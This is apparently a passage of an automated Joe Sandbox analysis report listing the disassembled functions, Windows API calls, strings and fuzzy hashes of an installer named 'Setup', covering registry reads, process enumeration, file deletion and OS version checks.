                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3
                                                              • String ID: CustomError$ReturnCode
                                                              • API String ID: 431132790-4065127629
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • _wcsnlen.LIBCMT ref: 6C94FF54
                                                              • _memcpy_s.LIBCMT ref: 6C94FF8A
                                                                • Part of subcall function 6C968E8C: __CxxThrowException@8.LIBCMT ref: 6C968EA0
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: Exception@8Throw_memcpy_s_wcsnlen
                                                              • String ID: OS Version Information
                                                              • API String ID: 31407445-551053750
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C48F0CF
                                                                • Part of subcall function 6C49F21D: _wcsnlen.LIBCMT ref: 6C49F1B2
                                                              • DeleteFileW.KERNEL32(00000000,00000010,HFI,00000000,00000000,6C4879E4,00000004,6C4A57E2,?,?,?,?,?,?,00000024,6C48F18B), ref: 6C48F14B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3303642901.000000006C481000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C480000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c480000_Setup.jbxd
                                                              Similarity
                                                              • API ID: DeleteFileH_prolog3_wcsnlen
                                                              • String ID: HFI
                                                              • API String ID: 1332513528-686494941
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C935325
                                                                • Part of subcall function 6C968AFC: _wcsnlen.LIBCMT ref: 6C968B0C
                                                              • DeleteFileW.KERNEL32(?,00000010,HFI,00000000,?,6C90AB18,00000004,6C95A448,512AC3CC,512AC3CC,?,?,6C944B23), ref: 6C935399
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: DeleteFileH_prolog3_wcsnlen
                                                              • String ID: HFI
                                                              • API String ID: 1332513528-686494941
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C953573
                                                                • Part of subcall function 6C91579B: _memset.LIBCMT ref: 6C9157CA
                                                                • Part of subcall function 6C91579B: GetVersionExW.KERNEL32 ref: 6C9157DF
                                                                • Part of subcall function 6C91579B: VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000001), ref: 6C9157F5
                                                                • Part of subcall function 6C91579B: VerSetConditionMask.KERNEL32(00000000,?,00000001,00000001), ref: 6C9157FD
                                                                • Part of subcall function 6C91579B: VerSetConditionMask.KERNEL32(00000000,?,00000020,00000001,?,00000001,00000001), ref: 6C915805
                                                                • Part of subcall function 6C91579B: VerSetConditionMask.KERNEL32(00000000,?,00000010,00000001,?,00000020,00000001,?,00000001,00000001), ref: 6C91580D
                                                                • Part of subcall function 6C91579B: VerifyVersionInfoW.KERNEL32(?,00000033,00000000), ref: 6C915818
                                                              Strings
                                                              • SYSTEM\CurrentControlSet\Control\Windows, xrefs: 6C9535E1
                                                              • CSDReleaseType, xrefs: 6C9535CC
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: ConditionMask$Version$H_prolog3InfoVerify_memset
                                                              • String ID: CSDReleaseType$SYSTEM\CurrentControlSet\Control\Windows
                                                              • API String ID: 3830908078-406884543
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?,6C94FA6E,?,?,?,?,?,?,6C9534F1,6C94FA6E,000000FF), ref: 6C951637
                                                              • GetLastError.KERNEL32(?,6C94FA6E,?,?,?,?,?,?,6C9534F1,6C94FA6E,000000FF,?,?,00000738,6C94FA6E,?), ref: 6C951647
                                                                • Part of subcall function 6C917479: __EH_prolog3.LIBCMT ref: 6C917480
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: DiskErrorFreeH_prolog3LastSpace
                                                              • String ID: GetDiskFreeSpaceEx
                                                              • API String ID: 3776785849-3355056173
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C94EC61
                                                                • Part of subcall function 6C943B2B: __EH_prolog3.LIBCMT ref: 6C943B32
                                                                • Part of subcall function 6C943B2B: InitializeCriticalSection.KERNEL32(00000002,?,00000000,00000000,00000002,?,?,00000000,?,?,?,?,00000008,6C94EC79,?,?), ref: 6C943BC9
                                                                • Part of subcall function 6C952C16: PathFileExistsW.SHLWAPI(00000000), ref: 6C952CA8
                                                                • Part of subcall function 6C952C16: __CxxThrowException@8.LIBCMT ref: 6C952CE7
                                                                • Part of subcall function 6C952C16: CopyFileW.KERNEL32(00000010,00000000,00000000,?), ref: 6C952D19
                                                                • Part of subcall function 6C952C16: SetFileAttributesW.KERNEL32(?,00000080), ref: 6C952D32
                                                              • InitializeCriticalSection.KERNEL32(?,?,?,.html,00000001,00000000,6C94747C,00000000,00000000,?,?,?,?,?,?,?), ref: 6C94ECBB
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: File$CriticalH_prolog3InitializeSection$AttributesCopyException@8ExistsPathThrow
                                                              • String ID: .html
                                                              • API String ID: 4277916732-2179875201
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,80000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 6C496636
                                                              • SetWindowPos.USER32(00000000,000000FF,00000000,00000000,00000000,00000000,00000013,?,6C4972CF), ref: 6C496648
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3303642901.000000006C481000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C480000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c480000_Setup.jbxd
                                                              Similarity
                                                              • API ID: Window$Create
                                                              • String ID: tooltips_class32
                                                              • API String ID: 870168347-1918224756
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C95A1ED
                                                              • GetCurrentProcessId.KERNEL32(00000020,6C9353D9,00000000,?,?,6C944B23), ref: 6C95A1FD
                                                                • Part of subcall function 6C935238: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 6C935254
                                                                • Part of subcall function 6C935238: _memset.LIBCMT ref: 6C93526E
                                                                • Part of subcall function 6C935238: Process32FirstW.KERNEL32(00000000,?), ref: 6C935288
                                                                • Part of subcall function 6C935238: FindCloseChangeNotification.KERNEL32(00000000), ref: 6C9352B7
                                                                • Part of subcall function 6C968EAB: _memcpy_s.LIBCMT ref: 6C968EFC
                                                                • Part of subcall function 6C948608: __wcsicoll.LIBCMT ref: 6C948626
                                                              • GetTempPathW.KERNEL32(00000104,00000000,6C944B23,6C944614,6C944B23,00000000,00000010,00000010,?,00000000,6C944614,?,?,6C944B23), ref: 6C95A415
                                                                • Part of subcall function 6C935238: Process32NextW.KERNEL32(00000000,0000022C), ref: 6C9352A3
                                                                • Part of subcall function 6C968AFC: _wcsnlen.LIBCMT ref: 6C968B0C
                                                                • Part of subcall function 6C93531E: __EH_prolog3.LIBCMT ref: 6C935325
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3Process32$ChangeCloseCreateCurrentFindFirstNextNotificationPathProcessSnapshotTempToolhelp32__wcsicoll_memcpy_s_memset_wcsnlen
                                                              • String ID:
                                                              • API String ID: 3672672585-0
                                                              • Opcode ID: bb44663b073ef2744fa38dd3243a0cd38c1195597334d533280a63cc0a94ae07
                                                              • Instruction ID: 974333920d48e744c8d569c75e4fa84dcf9a06ce4a2ba69d81c464ceab473e00
                                                              • Opcode Fuzzy Hash: bb44663b073ef2744fa38dd3243a0cd38c1195597334d533280a63cc0a94ae07
                                                              • Instruction Fuzzy Hash: C6919F71900248DFEB14DFF8C844AEDBBB4AF39328F544659E450ABB81DB34DA09CB65
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C4A558B
                                                              • GetCurrentProcessId.KERNEL32(?,?,?,?,00000024,6C48F18B,?), ref: 6C4A559B
                                                                • Part of subcall function 6C48EFE2: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 6C48EFFE
                                                                • Part of subcall function 6C48EFE2: _memset.LIBCMT ref: 6C48F018
                                                                • Part of subcall function 6C48EFE2: Process32FirstW.KERNEL32(00000000,?), ref: 6C48F032
                                                                • Part of subcall function 6C48EFE2: FindCloseChangeNotification.KERNEL32(00000000), ref: 6C48F061
                                                                • Part of subcall function 6C4A83ED: _memcpy_s.LIBCMT ref: 6C4A844E
                                                                • Part of subcall function 6C49EB56: __wcsicoll.LIBCMT ref: 6C49EB74
                                                              • GetTempPathW.KERNEL32(00000104,?,?,00000010,?,00000000,?,?,?,?,00000024,6C48F18B,?), ref: 6C4A57AE
                                                                • Part of subcall function 6C48EFE2: Process32NextW.KERNEL32(00000000,0000022C), ref: 6C48F04D
                                                                • Part of subcall function 6C48F0C8: __EH_prolog3.LIBCMT ref: 6C48F0CF
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3303642901.000000006C481000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C480000, based on PE: true
                                                              • Associated: 00000004.00000002.3303606880.000000006C480000.00000002.00000001.01000000.00000012.sdmp
                                                              • Associated: 00000004.00000002.3303701703.000000006C4BF000.00000004.00000001.01000000.00000012.sdmp
                                                              • Associated: 00000004.00000002.3303750684.000000006C4C0000.00000008.00000001.01000000.00000012.sdmp
                                                              • Associated: 00000004.00000002.3303786870.000000006C4C2000.00000004.00000001.01000000.00000012.sdmp
                                                              • Associated: 00000004.00000002.3303826195.000000006C4C5000.00000002.00000001.01000000.00000012.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c480000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3Process32$ChangeCloseCreateCurrentFindFirstNextNotificationPathProcessSnapshotTempToolhelp32__wcsicoll_memcpy_s_memset
                                                              • String ID:
                                                              • API String ID: 4125857435-0
                                                              • Opcode ID: 51eac29564e98a9295520be779b97375227264c1196c62b8145500173aad2767
                                                              • Instruction ID: b79bc3927d754f060d1290aff5af8292a958189894705c5251ecb67c3a43775a
                                                              • Opcode Fuzzy Hash: 51eac29564e98a9295520be779b97375227264c1196c62b8145500173aad2767
                                                              • Instruction Fuzzy Hash: 929148719015488FEB00DBF8C949EDDBBB0EF15328F144659E060AB799DB34A90ACBE1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C959893
                                                              • GetCommandLineW.KERNEL32(0000002C,6C95D52A,00000001,?,UiInfo.xml,?,?,00000000,?), ref: 6C9598B4
                                                                • Part of subcall function 6C913E77: __EH_prolog3.LIBCMT ref: 6C913E7E
                                                                • Part of subcall function 6C914412: __EH_prolog3.LIBCMT ref: 6C914419
                                                                • Part of subcall function 6C94833E: __EH_prolog3.LIBCMT ref: 6C948345
                                                                • Part of subcall function 6C9153D4: ExpandEnvironmentStringsW.KERNEL32(?,?,00000105,00000010,6C99EE70,?,?,?,?,6C95995C,00000000,?,UiInfo.xml,?,?,00000000), ref: 6C915412
                                                                • Part of subcall function 6C9153D4: ExpandEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,?,?,6C95995C,00000000,?,UiInfo.xml,?,?,00000000,?), ref: 6C915440
                                                              • PathIsRelativeW.SHLWAPI(?,?,?,00000000,?,UiInfo.xml,?,?,00000000,?), ref: 6C95996E
                                                                • Part of subcall function 6C915D3F: __EH_prolog3.LIBCMT ref: 6C915D46
                                                                • Part of subcall function 6C915D3F: GetModuleFileNameW.KERNEL32(6C8F0000,00000010,00000104,?,6C94831D,00000000), ref: 6C915D93
                                                                • Part of subcall function 6C948E4A: PathAppendW.SHLWAPI(00000000,?,?,?,?,?,6C9599FD,00000000,00000000,?,?,?,00000000,?,UiInfo.xml), ref: 6C948E6E
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3$EnvironmentExpandPathStrings$AppendCommandFileLineModuleNameRelative
                                                              • String ID:
                                                              • API String ID: 168041992-0
                                                              • Opcode ID: 6b4be46bf5ba509f32f70390dbeda5e449fde55542c527aa510d3b00d3d0c3c5
                                                              • Instruction ID: 4eb259b4f6e32eb83c28de21feb0c5e8337084ed45ca674441b5aa646a99f061
                                                              • Opcode Fuzzy Hash: 6b4be46bf5ba509f32f70390dbeda5e449fde55542c527aa510d3b00d3d0c3c5
                                                              • Instruction Fuzzy Hash: 0F418E71904149DBDF01DBF8C844ADDBBB9BF25318F244256E020EBB81CB34DA198BA5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • RegOpenKeyExW.KERNEL32(?,?,00000000,-00020018,6C622E5E,?,?,00000000,?,?,?,6C622E5E,80000002,Software\Microsoft\SQMClient,MachineId,?), ref: 6C621897
                                                              • RegQueryValueExW.KERNEL32(6C622E5E,?,00000000,00000027,80000002,?,?,00000000,?,?,?,6C622E5E,80000002,Software\Microsoft\SQMClient,MachineId,?), ref: 6C6218B3
                                                              • RegCloseKey.KERNEL32(6C622E5E,?,00000000,?,?,?,6C622E5E,80000002,Software\Microsoft\SQMClient,MachineId,?,00000027), ref: 6C6218D1
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3303901253.000000006C621000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C620000, based on PE: true
                                                              • Associated: 00000004.00000002.3303864433.000000006C620000.00000002.00000001.01000000.0000000B.sdmp
                                                              • Associated: 00000004.00000002.3303946399.000000006C640000.00000004.00000001.01000000.0000000B.sdmp
                                                              • Associated: 00000004.00000002.3303986988.000000006C641000.00000002.00000001.01000000.0000000B.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c620000_Setup.jbxd
                                                              Similarity
                                                              • API ID: CloseOpenQueryValue
                                                              • String ID:
                                                              • API String ID: 3677997916-0
                                                              • Opcode ID: 35472d5d66cefcef9772a6e1240be99005b799b7c44cc524351f697e8a97e61a
                                                              • Instruction ID: fbe7e997c5fa78b43b89551aef92fa3c573ff9acff40805b59b328845da65185
                                                              • Opcode Fuzzy Hash: 35472d5d66cefcef9772a6e1240be99005b799b7c44cc524351f697e8a97e61a
                                                              • Instruction Fuzzy Hash: 8D3103326051A5AFDB149F55C8C0F9A7BB4EB2174CF1041A9F910A79A1C339CD84DF99
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: String$AllocFreeH_prolog3
                                                              • String ID:
                                                              • API String ID: 2967515224-0
                                                              • Opcode ID: ff48dec0871fbdc7272bc38536cf2bea07430462664e7cd7bf6525d23bf81114
                                                              • Instruction ID: 22b594ce52b95f1de274e6b21c8fa39b88f5694f60c3e482e4caa3a49c4492af
                                                              • Opcode Fuzzy Hash: ff48dec0871fbdc7272bc38536cf2bea07430462664e7cd7bf6525d23bf81114
                                                              • Instruction Fuzzy Hash: 45318070A05249EFCF10DFA4C88999DBBB5BF15328F65856CE465EBA40C731DB85CB10
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3303642901.000000006C481000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C480000, based on PE: true
                                                              • Associated: 00000004.00000002.3303606880.000000006C480000.00000002.00000001.01000000.00000012.sdmp
                                                              • Associated: 00000004.00000002.3303701703.000000006C4BF000.00000004.00000001.01000000.00000012.sdmp
                                                              • Associated: 00000004.00000002.3303750684.000000006C4C0000.00000008.00000001.01000000.00000012.sdmp
                                                              • Associated: 00000004.00000002.3303786870.000000006C4C2000.00000004.00000001.01000000.00000012.sdmp
                                                              • Associated: 00000004.00000002.3303826195.000000006C4C5000.00000002.00000001.01000000.00000012.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c480000_Setup.jbxd
                                                              Similarity
                                                              • API ID: __recalloc$H_prolog3
                                                              • String ID:
                                                              • API String ID: 59120599-0
                                                              • Opcode ID: 3dbc8101a2f6d3039667a854add52716d431863821ae5b4ab43cec85ea3477c3
                                                              • Instruction ID: 019f6e28061bb1f475391611ef19d103a94257af4985767f4bdb64d1e89711b1
                                                              • Opcode Fuzzy Hash: 3dbc8101a2f6d3039667a854add52716d431863821ae5b4ab43cec85ea3477c3
                                                              • Instruction Fuzzy Hash: F31127716013029FE710CFA8C981F56BBE0EB14608F60882CE9A9CBB55DB31EC168B90
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C9566EC
                                                              • GetCommandLineW.KERNEL32(00000024,6C9536CF,00000000,?,?,?,?,6C951338,?,00000010,6C925A14,?,?,?,0000004C,6C95B498), ref: 6C9566F3
                                                                • Part of subcall function 6C913E77: __EH_prolog3.LIBCMT ref: 6C913E7E
                                                              • GetUserDefaultUILanguage.KERNEL32(00000738,00000000,00000000,?,?,?,6C951338,?,00000010,6C925A14,?,?,?,0000004C,6C95B498,?), ref: 6C95672F
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3$CommandDefaultLanguageLineUser
                                                              • String ID:
                                                              • API String ID: 4077140935-0
                                                              • Opcode ID: 08b33de2425aebebd5e32f8170e4ed93e5c031d1281d142f02c1aedc7e4a3fa4
                                                              • Instruction ID: 981ecc355fde23b1bdc6e8015f72ba1d38bd747e4b7d4864fdbedd7779ef5488
                                                              • Opcode Fuzzy Hash: 08b33de2425aebebd5e32f8170e4ed93e5c031d1281d142f02c1aedc7e4a3fa4
                                                              • Instruction Fuzzy Hash: 0E115E319017098FDB10DBA8D9849AD77B5AF64728B644755D121E7BC0DB30D954CB50
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • CreateThread.KERNEL32(00000000,00000000,Function_0001DFAB,?,00000000,00000000), ref: 6C49DF5E
                                                                • Part of subcall function 6C4A03F5: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,00000064,000004FF), ref: 6C4A0415
                                                                • Part of subcall function 6C4A03F5: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 6C4A042B
                                                                • Part of subcall function 6C4A03F5: TranslateMessage.USER32(?), ref: 6C4A0435
                                                                • Part of subcall function 6C4A03F5: DispatchMessageW.USER32(?), ref: 6C4A043F
                                                                • Part of subcall function 6C4A03F5: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 6C4A044E
                                                              • GetExitCodeThread.KERNEL32(00000000,000000FF), ref: 6C49DF77
                                                              • CloseHandle.KERNEL32(00000000), ref: 6C49DF7E
                                                                • Part of subcall function 6C49CB21: __EH_prolog3.LIBCMT ref: 6C49CB28
                                                                • Part of subcall function 6C49CB21: DestroyIcon.USER32(?,00000004), ref: 6C49CB50
                                                                • Part of subcall function 6C49CB21: DestroyIcon.USER32(?,00000004), ref: 6C49CB5D
                                                                • Part of subcall function 6C49CB21: DestroyIcon.USER32(?,00000004), ref: 6C49CB6A
                                                                • Part of subcall function 6C49CB21: DestroyIcon.USER32(?,00000004), ref: 6C49CB77
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3303642901.000000006C481000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C480000, based on PE: true
                                                              • Associated: 00000004.00000002.3303606880.000000006C480000.00000002.00000001.01000000.00000012.sdmp
                                                              • Associated: 00000004.00000002.3303701703.000000006C4BF000.00000004.00000001.01000000.00000012.sdmp
                                                              • Associated: 00000004.00000002.3303750684.000000006C4C0000.00000008.00000001.01000000.00000012.sdmp
                                                              • Associated: 00000004.00000002.3303786870.000000006C4C2000.00000004.00000001.01000000.00000012.sdmp
                                                              • Associated: 00000004.00000002.3303826195.000000006C4C5000.00000002.00000001.01000000.00000012.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c480000_Setup.jbxd
                                                              Similarity
                                                              • API ID: DestroyIconMessage$PeekThread$CloseCodeCreateDispatchExitH_prolog3HandleMultipleObjectsTranslateWait
                                                              • String ID:
                                                              • API String ID: 1402139836-0
                                                              • Opcode ID: f21005df252620479ffacc29ec03125b4ef8222b0db31b71605d13fdb7b4bb47
                                                              • Instruction ID: 3497b44210646b3e35eb50d857e59ed0d0dc412496fc4fa7cd100e5adf9123e7
                                                              • Opcode Fuzzy Hash: f21005df252620479ffacc29ec03125b4ef8222b0db31b71605d13fdb7b4bb47
                                                              • Instruction Fuzzy Hash: A0016532505214AFC700EF64CC09CABBBA9EF46324F008A1EF8658B150D731D916CB92
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: __recalloc$H_prolog3
                                                              • String ID:
                                                              • API String ID: 59120599-0
                                                              • Opcode ID: ee63c69177cd262e70c10350099fc1019734de36a0f5a289dda91d5de3881c4e
                                                              • Instruction ID: 7c0bb45e316b5c1668f8f112cb1954b5e134ee5bde2358ec73ab3475464938f4
                                                              • Opcode Fuzzy Hash: ee63c69177cd262e70c10350099fc1019734de36a0f5a289dda91d5de3881c4e
                                                              • Instruction Fuzzy Hash: 88011E756417029FE710EF69C941B6677E5EF29708F508828EAEACBB50E730E824DB50
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • RegOpenKeyExW.KERNEL32(80000002,?,00000000,00000001,?,?,?,?,?,6C9535F5,?,SYSTEM\CurrentControlSet\Control\Windows,?,?,CSDReleaseType), ref: 6C91C426
                                                              • RegQueryValueExW.KERNEL32(?,?,00000000,00000000,6C950F4A,00000004,?,?,?,6C9535F5,?,SYSTEM\CurrentControlSet\Control\Windows,?,?,CSDReleaseType), ref: 6C91C43F
                                                              • RegCloseKey.KERNEL32(?,?,?,?,6C9535F5,?,SYSTEM\CurrentControlSet\Control\Windows,?,?,CSDReleaseType,?,02642228,00000004,6C950F4A,?), ref: 6C91C44E
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: CloseOpenQueryValue
                                                              • String ID:
                                                              • API String ID: 3677997916-0
                                                              • Opcode ID: ffee4395cfb0d23bf2512616f92eac16ea112d64e4df7f144ada640c8cc8caf6
                                                              • Instruction ID: 9e2633967adca99f4723a86b617154282b9274f0b2e3a67607011234c5330763
                                                              • Opcode Fuzzy Hash: ffee4395cfb0d23bf2512616f92eac16ea112d64e4df7f144ada640c8cc8caf6
                                                              • Instruction Fuzzy Hash: 17F03CB2200108BFEB119FA5CC86EAE7B7DEF513A8F104225F92096690D771DE54AB64
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C917CEF
                                                                • Part of subcall function 6C94833E: __EH_prolog3.LIBCMT ref: 6C948345
                                                                • Part of subcall function 6C917EE4: __EH_prolog3.LIBCMT ref: 6C917EEB
                                                                • Part of subcall function 6C915DD0: __EH_prolog3.LIBCMT ref: 6C915DD7
                                                                • Part of subcall function 6C915485: __EH_prolog3.LIBCMT ref: 6C91548C
